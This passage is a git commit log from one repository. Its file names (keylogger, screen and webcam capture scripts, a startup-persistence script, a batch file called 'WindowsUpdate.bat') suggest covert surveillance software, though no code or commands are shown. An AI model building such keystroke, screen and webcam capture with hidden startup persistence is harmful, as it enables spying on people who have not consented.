    Update addtosturtup.py

commit c010e09f31ed4d54fb62d1b6380bdb87f655e443
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Fri Dec 24 20:07:39 2021 +0300

    Update README.md

commit 479e7fd3ee3a56478fbb5d531f900844c118845e
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Fri Dec 24 19:59:38 2021 +0300

    Delete WindowsUpdate.bat

commit e83810c79fc9c56022f4071f49874e7cee95985b
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Fri Dec 24 19:57:10 2021 +0300

    Add files via upload

commit 815e596a767b25661c39bd26fd2c7a02fa3fbf11
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Fri Dec 24 19:56:06 2021 +0300

    Update WindowsUpdate.bat

commit e0f1546645fd7d65cb42d24cd9df74cdfdaaa8a0
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Fri Dec 24 19:40:14 2021 +0300

    Delete screen+klgr.pyw

commit a9a6bf5fbad30497cfe02d8c4be627225201a711
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Fri Dec 24 19:40:04 2021 +0300

    Delete keylogger+screen+webcam.pyw

commit 10679bf746fe0c4a36dd77dac1a733db0c0ea503
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Fri Dec 24 19:38:31 2021 +0300

    Delete keylogger.pyw

commit 3fd44734a23e409026a4f23fb6a66a4114ec5f11
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Fri Dec 24 19:38:22 2021 +0300

    Delete screenshots.pyw

commit a2076d545347fed4f393081a8cd03fc0185df79d
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Fri Dec 24 19:37:57 2021 +0300

    Add files via upload

commit bcc2273f8ce29aa66894e974db7bae238b8938a4
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Fri Dec 24 19:35:52 2021 +0300

    Add files via upload

commit 9f55a0769e71e3645590a199b226370fb4467a57
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Fri Dec 24 19:34:05 2021 +0300

    Update terminate.bat

commit 97f4eca3f89603712c467474e113e984be0606f1
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Fri Dec 24 19:29:32 2021 +0300

    Add files via upload

commit d19d720acff5fd32823094ba3fa02fa537262439
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Fri Dec 24 19:29:12 2021 +0300

    Add files via upload

commit a31f2f2612c108faa25436f9a5a7189ed82fda6f
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Fri Dec 24 19:28:41 2021 +0300

    Delete launcher.py

commit 1fd39ff64339e4c96717f3eef50b13c4cce3d0b6
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Fri Dec 24 16:28:19 2021 +0300

    Update README.md

commit f5a8d1d387efdd6787548ab55597d61e06feaf00
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Fri Dec 24 14:30:35 2021 +0300

    Add files via upload

commit 4834829b3aa749a1c4aeb2b8206f75b5393c9742
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Fri Dec 24 14:30:20 2021 +0300

    Delete launcher.py

commit 194ea50d6d2c2301e5e695e62b0b68b328f7a38b
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Fri Dec 24 14:25:17 2021 +0300

    Update README.md

commit d992f0b53506855401cdc37e052bfe448252e60c
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Fri Dec 24 14:18:54 2021 +0300

    Add files via upload

commit addc5f6cf5f6fe70faa47dfa2e078924ab9f4494
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Fri Dec 24 14:18:22 2021 +0300

    Delete launcher.py

commit 2671c8ecafb4ef971e92342a2a14cbc08a7530b7
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Fri Dec 24 13:41:24 2021 +0300

    Update README.md

commit aba02fa54f6fe55421ecde867a2de3b40dd9bd47
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Fri Dec 24 12:44:57 2021 +0300

    Update README.md

commit 95e6769c90b9afa07b1e86b44a650afed29b637b
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Fri Dec 24 12:40:00 2021 +0300

    Update README.md

commit 9ec4f7227fd1113b6b901f48abe5fadfe5c748c6
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Fri Dec 24 12:39:27 2021 +0300

    Update README.md

commit 5bc8f33b682fcc3acbaa23348ef9592300af634e
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Fri Dec 24 12:38:52 2021 +0300

    Update README.md

commit 986c9740fec147bb4a4896592169af0009e4d4a8
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Fri Dec 24 12:36:17 2021 +0300

    Update README.md

commit 62e5797cd91184573880b35aaa8de9a6d1218345
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Fri Dec 24 12:35:49 2021 +0300

    Update README.md

commit 4474e8156f49b662202bd10c50c39cf610cc793d
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Fri Dec 24 12:35:23 2021 +0300

    Update README.md

commit 8770164d7b8066c0bdcea8067926867b707a99ce
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Fri Dec 24 12:34:51 2021 +0300

    Create README.md

commit da9b1e893864f320e33c3bef6e789a25e49db03c
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Fri Dec 24 11:59:18 2021 +0300

    Update README.md

commit 2a3d19ba67fb8b493cd6c1bf921c07719b7c4f6c
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Fri Dec 24 11:50:22 2021 +0300

    Update README.md

commit 3b9efa5ab6db7a48082292c4b4df4c654a610e3d
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Fri Dec 24 11:47:20 2021 +0300

    Update README.md

commit d9a3b27387e58264d3b3832efcd76b9725944b03
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Fri Dec 24 11:46:05 2021 +0300

    Add files via upload

commit 53c0ef870955734d50197dee0fcdad9c3bff9bc9
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Fri Dec 24 11:43:49 2021 +0300

    Update README.md

commit ae6e0ffda67806c0a105c3b5048778a630027710
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Fri Dec 24 11:43:08 2021 +0300

    Update README.md

commit 4458bed55cca7df38aef373b8036b59945705a79
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Fri Dec 24 11:34:20 2021 +0300

    Update README.md

commit 86b83283ea62eeef2139653ac406395cf670bc49
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Fri Dec 24 11:29:52 2021 +0300

    Update README.md

commit 6aef215a0bef3c1fc2a00d271624cac86658fad9
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Fri Dec 24 11:26:29 2021 +0300

    Update README.md

commit 5f1c296b2e6c798fcc4864f91a2486be170cd050
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Fri Dec 24 11:24:59 2021 +0300

    Update README.md

commit 73c7609eadc9dac6e18a70c8957bcc80820cfffc
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Fri Dec 24 11:24:28 2021 +0300

    Create README.md

commit bd51493739b52be9df53318df3ec26afa7aa533f
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Fri Dec 24 11:24:06 2021 +0300

    Update README.md

commit 7b44a308ce752253a1bc1b0238f40ff4e2d7258c
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Fri Dec 24 11:20:18 2021 +0300

    Add files via upload

commit e72158c93a6397c2e0249cca6b3d03c699563e84
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Fri Dec 24 11:17:26 2021 +0300

    Initial commit
